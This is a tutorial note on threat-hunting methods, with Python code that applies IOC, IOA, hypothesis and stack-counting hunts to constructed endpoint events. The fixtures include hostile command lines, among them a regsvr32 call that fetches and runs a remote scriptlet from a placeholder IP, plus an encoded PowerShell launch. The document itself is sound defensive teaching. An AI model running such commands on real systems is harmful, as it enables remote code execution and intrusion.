Methodologies

Hypothesis-driven
  • often triggered by a new threat identified in a large pool of crowdsourced attack data, which gives insight into attackers’ latest tactics, techniques and procedures (TTPs)

  • threat hunters then turn that intelligence into a testable hypothesis and search their own environment’s telemetry for the attacker’s specific behaviours, to confirm or rule out that the same TTPs are present

Known IOC and IOA
  • involves leveraging tactical threat intel to catalog known indicators of compromise (IOCs: atomic artifacts such as file hashes, IP addresses and domains) and indicators of attack (IOAs: attacker behaviours such as a suspicious parent/child process relationship, which survive a change of artifacts)

  • these catalogued indicators become triggers that threat hunters use to uncover hidden attacks or ongoing malicious activity

Advanced analytics and machine learning
  • combines data analysis at scale with machine learning to sift through massive amounts of telemetry for irregularities that may indicate malicious activity

  • these anomalies are hunting leads, not verdicts: skilled analysts investigate each one to confirm or dismiss a stealthy threat
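The three methodologies above, applied to one small set of constructed endpoint events, as an added example (this is not code from the original page, and the hosts, hashes, IPs and the regsvr32 hypothesis are placeholders chosen for illustration). The IOC function matches atomic artifacts from a catalogue, the IOA function matches a behaviour (an Office application spawning a scripting host), the hunt function tests a single hypothesis encoded as a predicate, and the analytics function is the simplest form of the third approach, stack counting of parent/child pairs across hosts, standing in for what a machine-learning model would surface as leads:

```python
"""Threat-hunting lenses over constructed telemetry (added example)."""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass(frozen=True)
class Event:
    host: str
    parent: str
    process: str
    cmdline: str
    dest_ip: str   # "" when the process made no network connection
    sha256: str    # shortened placeholder, not a real hash


# Constructed telemetry: a small fleet doing mostly normal things with a few
# planted findings. 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
EVENTS = [
    Event("ws01", "explorer.exe", "winword.exe", "winword.exe report.docx", "", "aa11"),
    Event("ws01", "winword.exe", "powershell.exe", "powershell -enc SQBFAFgA", "203.0.113.45", "bb22"),
    Event("ws02", "explorer.exe", "chrome.exe", "chrome.exe", "198.51.100.7", "cc33"),
    Event("ws02", "services.exe", "svchost.exe", "svchost.exe -k netsvcs", "", "dd44"),
    Event("ws03", "services.exe", "svchost.exe", "svchost.exe -k netsvcs", "", "dd44"),
    Event("ws03", "explorer.exe", "chrome.exe", "chrome.exe", "198.51.100.7", "cc33"),
    Event("ws04", "services.exe", "svchost.exe", "svchost.exe -k netsvcs", "", "dd44"),
    Event("ws04", "cmd.exe", "regsvr32.exe",
          "regsvr32 /s /u /i:http://203.0.113.9/a.sct scrobj.dll", "203.0.113.9", "ee55"),
    Event("ws05", "services.exe", "svchost.exe", "svchost.exe -k netsvcs", "", "dd44"),
    Event("ws05", "explorer.exe", "updater.exe", "updater.exe", "", "ff66"),
]

# --- Known IOC / IOA: a catalogue built from tactical intel (all placeholders) ---
IOC_HASHES = {"ff66"}          # constructed: a hash a report called malicious
IOC_IPS = {"203.0.113.45"}     # constructed: a reported C2 address
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def ioc_hits(events: Iterable[Event]) -> list[Event]:
    """Atomic indicator match: exact hash or destination IP from the catalogue."""
    return [e for e in events if e.sha256 in IOC_HASHES or e.dest_ip in IOC_IPS]


def ioa_hits(events: Iterable[Event]) -> list[Event]:
    """Behavioural match: an Office app spawning a scripting host. The hash and
    the IP can be rotated by the attacker; this parent/child relationship
    cannot without changing tradecraft."""
    return [e for e in events if e.parent in OFFICE_APPS and e.process in SCRIPT_HOSTS]


# --- Hypothesis-driven: encode one reported TTP as a predicate and test it ---
def hunt(events: Iterable[Event], hypothesis: Callable[[Event], bool]) -> list[Event]:
    return [e for e in events if hypothesis(e)]


def regsvr32_remote_scriptlet(e: Event) -> bool:
    """Hypothesis (assumed for the example): attackers proxy execution through
    regsvr32 loading a remote scriptlet via scrobj.dll."""
    c = e.cmdline.lower()
    return e.process == "regsvr32.exe" and "/i:http" in c and "scrobj.dll" in c


# --- Analytics: stack counting, rare parent/child pairs become hunting leads ---
def rare_pairs(events: Iterable[Event], max_hosts: int = 1) -> dict[tuple[str, str], set[str]]:
    """Count the distinct hosts on which each (parent, child) pair appears.
    Pairs seen on at most max_hosts hosts are leads for an analyst, not verdicts."""
    hosts_by_pair: dict[tuple[str, str], set[str]] = defaultdict(set)
    for e in events:
        hosts_by_pair[(e.parent, e.process)].add(e.host)
    return {pair: hosts for pair, hosts in hosts_by_pair.items() if len(hosts) <= max_hosts}


if __name__ == "__main__":
    print("IOC:", [(e.host, e.process) for e in ioc_hits(EVENTS)])
    print("IOA:", [(e.host, e.process) for e in ioa_hits(EVENTS)])
    print("Hypothesis:", [(e.host, e.cmdline) for e in hunt(EVENTS, regsvr32_remote_scriptlet)])
    print("Rare pairs:", sorted(rare_pairs(EVENTS)))
```

Note how the outputs differ in kind: the IOC and IOA matches and the hypothesis hit point at specific events, while stack counting returns four rare pairs, two of them malicious (winword.exe spawning powershell.exe, cmd.exe spawning regsvr32.exe) and two merely uncommon (explorer.exe opening winword.exe, and the unknown updater.exe). That is why the analytics approach produces leads for an analyst rather than alerts.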
